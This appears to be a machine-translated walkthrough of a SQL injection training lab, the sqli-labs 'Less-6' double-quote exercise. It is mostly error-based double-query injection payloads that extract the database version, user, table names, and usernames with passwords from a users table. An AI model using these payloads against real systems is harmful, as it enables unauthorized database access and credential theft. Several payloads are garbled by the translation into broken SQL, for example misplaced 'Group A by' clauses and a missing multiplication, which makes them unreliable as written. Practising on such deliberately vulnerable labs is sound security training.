Less-6 GET - Double Injection -Double quotes - String
1.原页面
2.?id=1
3.?id=1
‘’’1\’’ LIMIT 0,1’ --> ‘ ‘’1\’’LIMIT 0,1 ‘ --> ‘’1\’’LIMIT 0,1 -->
SQL:
Select login_name,password from admin where id=’’input’’ limit 0,1;
4. Access database
? Id = 0 "union select 1 , count (*), concat ((select concat (version (), 0x3a, 0x3a, database (), 0x3a, 0x3a, user (), 0x3a) limit 0,1 ), Floor (RAND (0) 2)) AS information_schema.tables from Group A by + A-
(specifically see principle: HTTPS: //blog.csdn.net/qq_42630215/article/details/104700359)
5. The acquisition table name
? the above mentioned id = 0 "of Union the SELECT 1, COUNT ( ), concat ((the SELECT concat (table_name, 0x3a, 0x3a) from the WHERE information_schema.tables table_schema = Database () limit 0, 1), Floor (RAND (0) * 2 )) as a from information_schema.tables group by a - +
View other tables, limit values can be changed
6. Obtain user information
? Id = 0 "union select 1 , count (*), concat ((select concat (username, 0x3a, 0x3a, password, 0x3a, 0x3a) from security.users limit 1,1), floor (rand (0) * 2)) as a from information_schema.tables group by a - +
obtain information about another user, can change limit value